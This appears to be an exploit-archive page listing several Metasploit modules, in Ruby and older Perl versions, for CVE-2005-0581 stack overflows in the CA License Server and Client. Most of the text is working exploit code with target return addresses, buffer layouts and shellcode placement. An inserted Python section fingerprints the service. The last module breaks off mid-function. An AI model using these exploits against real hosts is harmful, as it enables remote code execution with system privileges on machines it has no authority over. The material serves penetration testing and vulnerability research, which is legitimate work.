			'Privileged' => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload' =>
				{
					'Space'	=> 600,
					'BadChars' => "\x00\x20",
					'StackAdjustment' => -3500,

				},
			'Platform'	=> 'win',
			'Targets' =>
				[
					# As much as I would like to return back to the DLL or EXE,
					# all of those modules have a leading NULL in the
					# loaded @ address :(
					# name, jmp esi, writable, jmp edi
					#['Automatic', {} ],
					#
					# patrickw - tested OK Windows XP English SP0-1 only 20100214
					['Windows 2000 English',	{ 'Rets' => [ 0x750217ae, 0x7ffde0cc, 0x75021421 ] } ], # ws2help.dll esi + peb + edi
					['Windows XP English SP0-1',	{ 'Rets' => [ 0x71aa16e5, 0x7ffde0cc, 0x71aa19e8 ] } ], # ws2help.dll esi + peb + edi
					['Windows XP English SP2',	{ 'Rets' => [ 0x71aa1b22, 0x71aa5001, 0x71aa1e08 ] } ], # ws2help.dll esi + .data + edi
					['Windows 2003 English SP0',	{ 'Rets' => [ 0x71bf175f, 0x7ffde0cc, 0x71bf1a2c ] } ], # ws2help.dll esi + peb + edi
				],
			'DisclosureDate' => 'Mar 02 2005'))

		register_options(
			[
				Opt::RPORT(10202),
			], self.class)
	end

	def check
		connect
		banner = sock.get_once
		sock.put("A0 GETCONFIG SELF 0<EOM>")
		res = sock.get_once
		disconnect
		if (res =~ /OS\<([^\>]+)/)
			print_status("CA License Server reports OS: #{$1}")
			return Exploit::CheckCode::Detected
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect
		banner = sock.get_once
		if (banner !~ /GETCONFIG/)
			print_status("The server did not return the expected greeting!")
		end

		# exploits two different versions at once >:-)
		# 144 -> return address of esi points to string middle
		# 196 -> return address of edi points to string beginning
		# 148 -> avoid exception by patching with writable address
		# 928 -> seh handler (not useful under XP SP2)
		buff = rand_text_alphanumeric(900)
		buff[142, 2] = Rex::Arch::X86.jmp_short(8) 		# jmp over addresses
		buff[144, 4] = [target['Rets'][0]].pack('V') 		# jmp esi
		buff[148, 4] = [target['Rets'][1]].pack('V')		# writable address
		buff[194, 2] = Rex::Arch::X86.jmp_short(4)		# jmp over address
		buff[196, 4] = [target['Rets'][2]].pack('V')		# jmp edi
		buff[272, payload.encoded.length] = payload.encoded

		sploit = "A0 GETCONFIG SELF #{buff}<EOM>"
		sock.put(sploit)

		handler
		disconnect
	end

end

=begin
eTrust: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.2>OLFFILE<0 0 0>SERVER<RMT>VERSION<0 1.61.0>NETWORK<192.168.3.22 unknown 255.255.255.0>MACHINE<PC_686_1_2084>CHECKSUMS<0 0 0 0 0 0 0 00 0 0 0>RMTV<1.3.1><EOM>
BrightStor: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.54.0>NETWORK<11.11.11.111 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>
lic98rmt.exe v0.1.0.15: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.61.0>NETWORK<192.168.139.128 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>
=end
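The check method in the server module above is the safe way to establish whether a host is running the license server at all: connect to TCP 10202, expect a greeting that mentions GETCONFIG, send `A0 GETCONFIG SELF 0<EOM>` and read the OS<...> item out of the reply. Below is a standalone version of that probe, added for this page rather than taken from Metasploit, with a constructed fake server so the exchange runs offline. The greeting text and the item layout of the reply are assumptions modelled on the module's two regexes; only the presence of GETCONFIG in the greeting and of an OS<...> item in the reply is documented on this page. Do not point it at the client port 10203: as the client module's description notes, the agent accepts one connection and then ignores further ones, and class101's notes mention the service auto-banning, so a probe there burns the single attempt you get.

```python
"""Non-destructive fingerprint of a CA License Server on TCP 10202.
Added example for this page, not Metasploit code: it reproduces the probe the
calicserv_getconfig check method performs. The fake server, its greeting and its
reply are constructed so the exchange runs offline; their exact text is an assumption,
only 'GETCONFIG' in the greeting and an OS<...> item in the reply are documented."""
import re
import socket
import threading

EOM = b"<EOM>"
FIELD_RE = re.compile(rb"([A-Z0-9]+)<([^<>]*)>")
PROBE = b"A0 GETCONFIG SELF 0" + EOM        # harmless: a one-byte last parameter


def recv_message(sock, limit=4096):
    """Read until <EOM>, peer close, timeout or limit; return what arrived."""
    buf = b""
    while EOM not in buf and len(buf) < limit:
        try:
            chunk = sock.recv(1024)
        except socket.timeout:
            break
        if not chunk:
            break
        buf += chunk
    return buf


def parse_reply(reply):
    """NAME<value> items of a reply as a dict (values kept latin-1, may be non-ASCII)."""
    return {n.decode(): v.decode("latin-1") for n, v in FIELD_RE.findall(reply)}


def fingerprint(host, port=10202, timeout=5.0):
    """Return the reply items plus the greeting, or None if this is not a license server."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        greeting = recv_message(s)
        if b"GETCONFIG" not in greeting:
            return None
        s.sendall(PROBE)
        info = parse_reply(recv_message(s))
    if "OS" not in info:
        return None
    info["greeting"] = greeting.decode("latin-1")
    return info


# ---- constructed stand-in for a license server so the probe can run offline ----
FAKE_GREETING = b"A0 GETCONFIG SELF 0<EOM>"   # assumed: the server opens by asking for config
FAKE_REPLY = (b"HOSTNAME<lab-srv>OS<Windows_NT 5.1>VERSION<3 1.61.0>"
              b"NETWORK<192.168.139.128 unknown 255.255.255.0>RMTV<1.00><EOM>")


def serve_once(listener):
    """Accept one client, greet it, answer one GETCONFIG probe, close."""
    conn, _ = listener.accept()
    with conn:
        conn.sendall(FAKE_GREETING)
        if PROBE in recv_message(conn):
            conn.sendall(FAKE_REPLY)


def demo():
    """Run the fake server on a free loopback port and fingerprint it."""
    listener = socket.socket()
    listener.settimeout(5)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]
    worker = threading.Thread(target=serve_once, args=(listener,), daemon=True)
    worker.start()
    try:
        return fingerprint("127.0.0.1", port)
    finally:
        worker.join(5)
        listener.close()


if __name__ == "__main__":
    print(demo())
```

Against a real host call `fingerprint("10.0.0.5")`; a None result means either no greeting with GETCONFIG or no OS<...> item came back, both of which rule out the affected service on that port. Whatever the reply lists under OS and VERSION is only a hint, since the patched builds in CA's hotfix are not distinguishable from this page's data alone; confirm with the file version of lic98rmt.exe on the host.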

		

- Vulnerability information (F86301)

Computer Associates License Client GETCONFIG Overflow (PacketStormID:F86301)
2010-02-15 00:00:00
patrick,Thor Doomen  metasploit.com
exploit,local,udp
windows
CVE-2005-0581
[Download]

This Metasploit module exploits a vulnerability in the CA License Client service. This exploit will only work if your IP address can be resolved from the target system's point of view. This can be accomplished on a local network by running the 'nmbd' service that comes with Samba. If you are running this exploit from Windows and do not filter udp port 137, this should not be a problem (if the target is on the same network segment). Due to the bugginess of the software, you are only allowed one connection to the agent port before it starts ignoring you. If it wasn't for this issue, it would be possible to repeatedly exploit this bug.

##
# $Id: calicclnt_getconfig.rb 8478 2010-02-13 16:16:13Z patrickw $
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'		=> 'Computer Associates License Client GETCONFIG Overflow',
			'Description'	=> %q{
				This module exploits a vulnerability in the CA License Client
				service. This exploit will only work if your IP address can be 
				resolved from the target system's point of view. This can be
				accomplished on a local network by running the 'nmbd' service
				that comes with Samba. If you are running this exploit from
				Windows and do not filter udp port 137, this should not be a
				problem (if the target is on the same network segment). Due to
				the bugginess of the software, you are only allowed one connection
				to the agent port before it starts ignoring you. If it wasn't for this
				issue, it would be possible to repeatedly exploit this bug.
			},
			'Author' => [
					'Thor Doomen <syscall [at] hushmail.com>', # original msf v2 module
					'patrick', # msf v3 port :)
				    ],
			'License' => MSF_LICENSE,
			'Version' => '$Revision: 8478 $',
			'References'	=>
				[
					[ 'CVE', '2005-0581' ],
					[ 'OSVDB', '14389' ],
					[ 'BID', '12705' ],
					[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213' ],
				],
			'Privileged' => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload' =>
				{
					'Space'	=> 600,
					'BadChars' => "\x00\x20",
					'StackAdjustment' => -3500,

				},
			'Platform'	=> 'win',
			'Targets' =>
				[
					# As much as I would like to return back to the DLL or EXE,
					# all of those modules have a leading NULL in the
					# loaded @ address :(
					# name, jmp esi, writable, jmp edi
					#['Automatic', {} ],
					#
					# patrickw - tested OK Windows XP English SP0-1 only 20100214
					['Windows 2000 English',	{ 'Rets' => [ 0x750217ae, 0x7ffde0cc, 0x75021421 ] } ], # ws2help.dll esi + peb + edi
					['Windows XP English SP0-1',	{ 'Rets' => [ 0x71aa16e5, 0x7ffde0cc, 0x71aa19e8 ] } ], # ws2help.dll esi + peb + edi
					['Windows XP English SP2',	{ 'Rets' => [ 0x71aa1b22, 0x71aa5001, 0x71aa1e08 ] } ], # ws2help.dll esi + .data + edi
					['Windows 2003 English SP0',	{ 'Rets' => [ 0x71bf175f, 0x7ffde0cc, 0x71bf1a2c ] } ], # ws2help.dll esi + peb + edi
				],
			'DisclosureDate' => 'Mar 02 2005'))

			register_options(
				[
					Opt::RPORT(10203),
					OptPort.new('SRVPORT', [ true, "Fake CA License Server Port", 10202 ]),
				], self.class)
	end
	
	#def check
		# It is possible to check, but due to a software bug, checking prevents exploitation
	#end

	def exploit
		if (connect)
			sock.put("A0 GETSERVER<EOM>\n")
			print_status("Initial packet sent to remote agent...")
			disconnect

			fakecaservice = Rex::Socket::TcpServer.create(
				'LocalHost' => '0.0.0.0',
				'LocalPort' => datastore['SRVPORT'],
				'SSL'       => false,
				'Context'   =>
					{
						'Msf'        => framework,
						'MsfExploit' => self,
					})

			fakecaservice.start
			print_status("Waiting for the license agent to connect back...")
			begin
				Timeout.timeout(3) do
					done = false
					while (not done and session = fakecaservice.accept)
						print_status("Accepted connection from agent #{Rex::Socket.source_address(rhost)}..")
						session.put("A0 GETCONFIG SELF 0<EOM>")
						req = session.recvfrom(2000)[0]
						next if not req
						next if req.empty?
										
						if (req =~ /OS\<([^\>]+)/)
							print_status("Target reports OS: #{$1}")
						end

						# exploits two different versions at once >:-)
						# 144 -> return address of esi points to string middle
						# 196 -> return address of edi points to string beginning	
						# 148 -> avoid exception by patching with writable address
						# 928 -> seh handler (not useful under XP SP2)
						buff = rand_text_alphanumeric(900)
						buff[142, 2] = Rex::Arch::X86.jmp_short(8) 		# jmp over addresses
						buff[144, 4] = [target['Rets'][0]].pack('V') 		# jmp esi
						buff[148, 4] = [target['Rets'][1]].pack('V')		# writable address
						buff[194, 2] = Rex::Arch::X86.jmp_short(4)		# jmp over address
						buff[196, 4] = [target['Rets'][2]].pack('V')		# jmp edi
						buff[272, payload.encoded.length] = payload.encoded

						sploit = "A0 GETCONFIG SELF #{buff}<EOM>"
						session.put(sploit)
						session.close
					end
				end
			ensure
				handler
				fakecaservice.close
				return
			end
		end
	end

end

=begin
eTrust: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.2>OLFFILE<0 0 0>SERVER<RMT>VERSION<0 1.61.0>NETWORK<192.168.3.22 unknown 255.255.255.0>MACHINE<PC_686_1_2084>CHECKSUMS<0 0 0 0 0 0 0 00 0 0 0>RMTV<1.3.1><EOM>
BrightStor: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.54.0>NETWORK<11.11.11.111 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>
lic98rmt.exe v0.1.0.15: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.61.0>NETWORK<192.168.139.128 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>
=end

    

- Vulnerability information (F86298)

Computer Associates License Server GETCONFIG Overflow (PacketStormID:F86298)
2010-02-15 00:00:00
patrick,Thor Doomen  metasploit.com
exploit
CVE-2005-0581

This Metasploit module exploits a vulnerability in the CA License Server network service. By sending an excessively long GETCONFIG packet the stack may be overwritten.

##
# $Id: calicserv_getconfig.rb 8478 2010-02-13 16:16:13Z patrickw $
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name' => 'Computer Associates License Server GETCONFIG Overflow',
			'Description'	=> %q{
				This module exploits a vulnerability in the CA License Server
				network service. By sending an excessively long GETCONFIG
				packet the stack may be overwritten.
			},
			'Author' => [
					'Thor Doomen <syscall [at] hushmail.com>', # original msf v2 module
					'patrick', # msf v3 port :)
				    ],
			'License' => MSF_LICENSE,
			'Version' => '$Revision: 8478 $',
			'References'	=>
				[
					[ 'CVE', '2005-0581' ],
					[ 'OSVDB', '14389' ],
					[ 'BID', '12705' ],
					[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213' ],
				],
			'Privileged' => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload' =>
				{
					'Space'	=> 600,
					'BadChars' => "\x00\x20",
					'StackAdjustment' => -3500,

				},
			'Platform'	=> 'win',
			'Targets' =>
				[
					# As much as I would like to return back to the DLL or EXE,
					# all of those modules have a leading NULL in the
					# loaded @ address :(
					# name, jmp esi, writable, jmp edi
					#['Automatic', {} ],
					#
					# patrickw - tested OK Windows XP English SP0-1 only 20100214
					['Windows 2000 English',	{ 'Rets' => [ 0x750217ae, 0x7ffde0cc, 0x75021421 ] } ], # ws2help.dll esi + peb + edi
					['Windows XP English SP0-1',	{ 'Rets' => [ 0x71aa16e5, 0x7ffde0cc, 0x71aa19e8 ] } ], # ws2help.dll esi + peb + edi
					['Windows XP English SP2',	{ 'Rets' => [ 0x71aa1b22, 0x71aa5001, 0x71aa1e08 ] } ], # ws2help.dll esi + .data + edi
					['Windows 2003 English SP0',	{ 'Rets' => [ 0x71bf175f, 0x7ffde0cc, 0x71bf1a2c ] } ], # ws2help.dll esi + peb + edi
				],
			'DisclosureDate' => 'Mar 02 2005'))

			register_options(
				[
					Opt::RPORT(10202),
				], self.class)
	end
	
	def check
		connect
		banner = sock.get_once
		sock.put("A0 GETCONFIG SELF 0<EOM>")
		res = sock.get_once
		disconnect
		if (res =~ /OS\<([^\>]+)/)
			print_status("CA License Server reports OS: #{$1}")
			return Exploit::CheckCode::Detected
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect
		banner = sock.get_once
		if (banner !~ /GETCONFIG/)
			print_status("The server did not return the expected greeting!")
		end

		# exploits two different versions at once >:-)
		# 144 -> return address of esi points to string middle
		# 196 -> return address of edi points to string beginning	
		# 148 -> avoid exception by patching with writable address
		# 928 -> seh handler (not useful under XP SP2)
		buff = rand_text_alphanumeric(900)
		buff[142, 2] = Rex::Arch::X86.jmp_short(8) 		# jmp over addresses
		buff[144, 4] = [target['Rets'][0]].pack('V') 		# jmp esi
		buff[148, 4] = [target['Rets'][1]].pack('V')		# writable address
		buff[194, 2] = Rex::Arch::X86.jmp_short(4)		# jmp over address
		buff[196, 4] = [target['Rets'][2]].pack('V')		# jmp edi
		buff[272, payload.encoded.length] = payload.encoded

		sploit = "A0 GETCONFIG SELF #{buff}<EOM>"
		sock.put(sploit)
		
		handler
		disconnect
	end

end

=begin
eTrust: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.2>OLFFILE<0 0 0>SERVER<RMT>VERSION<0 1.61.0>NETWORK<192.168.3.22 unknown 255.255.255.0>MACHINE<PC_686_1_2084>CHECKSUMS<0 0 0 0 0 0 0 00 0 0 0>RMTV<1.3.1><EOM>
BrightStor: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.54.0>NETWORK<11.11.11.111 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>
lic98rmt.exe v0.1.0.15: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.61.0>NETWORK<192.168.139.128 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>
=end

    

- Vulnerability information (F82942)

CA BrightStor ARCserve License Service GCR NETWORK Buffer Overflow (PacketStormID:F82942)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow,arbitrary
CVE-2005-0581

This Metasploit module exploits a stack overflow in Computer Associates BrightStor ARCserve Backup 11.0. By sending a specially crafted request to the lic98rmtd.exe service, an attacker could overflow the buffer and execute arbitrary code.

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'CA BrightStor ARCserve License Service GCR NETWORK Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in Computer Associates BrightStor ARCserve Backup 11.0. 
				By sending a specially crafted request to the lic98rmtd.exe service, an attacker 
				could overflow the buffer and execute arbitrary code.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2005-0581' ],
					[ 'OSVDB', '14389' ],
					[ 'BID', '12705' ],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x09\x0a\x0d\x20\x0c\x25\x26\x27\x0b\x2b\x2f\x3a\x3c\x3e\x3f\x40",
					'StackAdjustment' => -3500,
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Platform' => 'win',
			'Targets'  =>
					[ 
						[ 'Windows 2003 SP0 English',     { 'Ret' => 0x71ae1f9b } ], # JMP ESP wshtcpip.dll
						[ 'Windows 2000 SP4 English',     { 'Ret' => 0x7c30d043 } ], # JMP ESP advapi32.dll
					],	
			'DisclosureDate' => 'Mar 2 2005',
			'DefaultTarget' => 0))

			register_options([ Opt::RPORT(10202) ], self.class)	
	end

	def exploit
		connect

		buff =  rand_text_alpha_upper(256) + [target.ret].pack('V')
		buff << make_nops(12) + payload.encoded

		# NETWORK<x.x.x.x buff x.x.x.x.x> ... worked for me.	
		sploit  = "A0 GCR NETWORK<#{buff}>RMTV<1.00><EOM>"
		
		print_status("Trying target #{target.name}...")
		
		sock.puts(sploit)
		
		handler
		disconnect
	end

end
    

- Vulnerability information (F36485)

101_cali.c (PacketStormID:F36485)
2005-03-12 00:00:00
class101  class101.org
exploit,overflow
CVE-2005-0581

This exploit takes advantage of a stack overflow vulnerability in the CA License Server network service. Versions 1.61 and below are susceptible.

- Vulnerability information (F36463)

calicserv_getconfig.pm (PacketStormID:F36463)
2005-03-05 00:00:00
Thor Doomen  
exploit,overflow
CVE-2005-0581

This module exploits a vulnerability in the CA License Server network service. This is a simple stack overflow and just one of many serious problems with this software.

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::calicserv_getconfig;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
  {
	'Name'  => 'CA License Server GETCONFIG Overflow',
	'Version'  => '$Revision: 1.8 $',
	'Authors' => [ 'Thor Doomen <syscall [at] hushmail.com>' ],
	'Arch'  => [ 'x86' ],
	'OS'    => [ 'win32', 'win2000', 'winxp', 'win2003' ],
	'Priv'  => 1,
	'AutoOpts'  => { 'EXITFUNC' => 'thread' },
	'UserOpts'  => {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 10202],
	  },

	'Payload' =>
	  {
		'Space'		=> 600,
		'BadChars'	=> "\x00\x20",
		'Prepend'	=> "\x81\xc4\x54\xf2\xff\xff",
		'Keys'		=> ['+ws2ord'],
	  },

	'Description'  => Pex::Text::Freeform(qq{
        This module exploits a vulnerability in the CA License Server
        network service. This is a simple stack overflow and just one of
        many serious problems with this software.
}),

	'Refs'    =>
	  [
		['BID', '12705'],
		['CVE', '2005-0581'],
		['URL', 'http://www.idefense.com/application/poi/display?id=213&type=vulnerabilities'],
	  ],

	'Targets' => [

		# As much as I would like to return back to the DLL or EXE,
		# all of those modules have a leading NULL in the
		# loaded @ address :(

		['Automatic', 0],
		['Windows 2000 English',         0x750217ae, 0x7ffde0cc], # ws2help.dll esi + peb
		['Windows XP English SP0-1',     0x71aa16e5, 0x7ffde0cc], # ws2help.dll esi + peb
		['Windows XP English SP2',       0x71aa1b22, 0x71aa5001], # ws2help.dll esi + .data
		['Windows 2003 English SP0',     0x71bf175f, 0x7ffde0cc], # ws2help.dll esi + peb
	  ],
	'Keys'  => ['calicense'],
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Check {
	my $self = shift;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');
	my $data = $self->GetConfig($target_host, $target_port);
	if (! $data) {
		$self->PrintLine("[*] Could not read remote configuration");
		return $self->CheckCode('Connect');
	}

	$self->PrintLine("[*] License Server: $data");
	return $self->CheckCode('Detected');
}

sub Exploit {
	my $self = shift;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');
	my $target_idx  = $self->GetVar('TARGET');
	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
	my $target = $self->Targets->[$target_idx];

	if ($target_idx == 0) {
		my $data = $self->GetConfig($target_host, $target_port);
		if ($data =~ m/OS\<([^\>]+)/) {
			my $os = $1;
			$os =~ s/_NT//g;
			$os =~ s/5\.1/XP/;
			$os =~ s/5\.2/2003/;
			$os =~ s/5\.0/2000/;
			$os =~ s/4\.0/NT 4.0/;

			my @targs;
			for (1 .. (scalar(@{$self->Targets})-1)) {
				if (index($self->Targets->[$_]->[0], $os) != -1) {
					push @targs, $_;
				}
			}

			if (scalar(@targs) > 1) {
				$self->PrintLine("[*] Multiple possible targets:");
				foreach (@targs) {
					$self->PrintLine("[*]  $_\t".$self->Targets->[$_]->[0]);
				}
				return;
			}

			if (scalar(@targs) == 1) {
				$target = $self->Targets->[$targs[0]];
			}

			if (! scalar(@targs)) {
				$self->PrintLine("[*] No matching target for $os");
				return;
			}

		} else {
			$self->PrintLine("[*] Could not determine the remote OS automatically");
			return;
		}
	}

	$self->PrintLine("[*] Attempting to exploit target " . $target->[0]);

	my $s = Msf::Socket::Tcp->new
	  (
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
		'LocalPort' => $self->GetVar('CPORT'),
		'SSL'       => $self->GetVar('SSL'),
	  );

	if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return;
	}

	# Read the initial greeting from the license server
	my $res = $s->Recv(-1, 1);
	if (! $res || $res !~ /GETCONFIG/) {
		$self->PrintLine("[*] The server did not return the expected greeting");
		return;
	}

	my $boom = Pex::Text::EnglishText(900);

	# 144 -> original return address
	# 148 -> avoid exception by patching with writable address
	# 928 -> seh handler (not useful under XP SP2)

	substr($boom, 144, 4, pack('V', $target->[1]));     # jmp esi
	substr($boom, 148, 4, pack('V', $target->[2]));     # writable address
	substr($boom, 272, length($shellcode), $shellcode);

	my $req = "A0 GETCONFIG SELF $boom<EOM>";

	$self->PrintLine("[*] Sending " .length($req) . " bytes to remote host.");
	$s->Send($req);

	return;
}

# Returns data in the following format
#A0 GCR HOSTNAME<BOOFERM>HARDWARE<009c059010204>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.54.0>NETWORK<11.11.11.111 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>

sub GetConfig {
	my $self = shift;
	my $target_host = shift;
	my $target_port = shift;

	my $s = Msf::Socket::Tcp->new
	  (
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
		'LocalPort' => $self->GetVar('CPORT'),
		'SSL'       => $self->GetVar('SSL'),
	  );

	if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return;
	}

	# Receive the message that is first sent
	$s->Recv(-1, 1);

	# Ask for the configuration info
	$s->Send("A0 GETCONFIG SELF 0<EOM>");
	my $res = $s->Recv(-1, 2);

	# Close the socket
	$s->Close;

	# Return the data
	return $res;
}

1;

    

- Vulnerability information (F36462)

calicclnt_getconfig.pm (PacketStormID:F36462)
2005-03-05 00:00:00
Thor Doomen  
exploit,local,udp
windows
CVE-2005-0581

This module exploits a vulnerability in the CA License Client service. This exploit will only work if your IP address will resolve to the target system. This can be accomplished on a local network by running the nmbd service that comes with Samba. If you are running this exploit from Windows and do not filter udp port 137, this should not be a problem (if the target is on the same network segment). Due to the bugginess of the software, you are only allowed one connection to the agent port before it starts ignoring you. If it was not for this issue, it would be possible to repeatedly exploit this bug.

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::calicclnt_getconfig;
use base "Msf::Exploit";
use strict;
use Pex::Text;

use IO::Socket;
use IO::Select;

my $advanced = { };

my $info =
  {
	'Name'  => 'CA License Client GETCONFIG Overflow',
	'Version'  => '$Revision: 1.7 $',
	'Authors' => [ 'Thor Doomen <syscall [at] hushmail.com>' ],
	'Arch'  => [ 'x86' ],
	'OS'    => [ 'win32', 'win2000', 'winxp', 'win2003' ],
	'Priv'  => 1,
	'AutoOpts'  => { 'EXITFUNC' => 'process' }, # avoid the ugly pop-up
	'UserOpts'  => {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 10203],
	  },

	'Payload' =>
	  {
		'Space'		=> 600,
		'BadChars'	=> "\x00\x20",
		'Prepend'	=> "\x81\xc4\x54\xf2\xff\xff",
		'Keys'		=> ['+ws2ord'],
	  },

	'Description'  => Pex::Text::Freeform(qq{
        This module exploits a vulnerability in the CA License Client
        service. This exploit will only work if your IP address will 
        resolve to the target system. This can be accomplished on a local
        network by running the 'nmbd' service that comes with Samba. If
        you are running this exploit from Windows and do not filter udp
        port 137, this should not be a problem (if the target is on the same
        network segment). Due to the bugginess of the software, you are
        only allowed one connection to the agent port before it starts
        ignoring you. If it wasn't for this issue, it would be possible to
        repeatedly exploit this bug.
        
}),

	'Refs'    =>
	  [
		['BID', '12705'],
		['CVE', '2005-0581'],
		['URL', 'http://www.idefense.com/application/poi/display?id=213&type=vulnerabilities'],
	  ],

	'Targets' => [

		# As much as I would like to return back to the DLL or EXE,
		# all of those modules have a leading NULL in the
		# loaded @ address :(

		['Automatic', 0],
		['Windows 2000 English',         0x750217ae, 0x7ffde0cc], # ws2help.dll esi + peb
		['Windows XP English SP0-1',     0x71aa16e5, 0x7ffde0cc], # ws2help.dll esi + peb
		['Windows XP English SP2',       0x71aa1b22, 0x71aa5001], # ws2help.dll esi + .data
		['Windows 2003 English SP0',     0x71bf175f, 0x7ffde0cc], # ws2help.dll esi + peb
	  ],
	'Keys'  => ['calicense'],
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Exploit {
	my $self = shift;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');
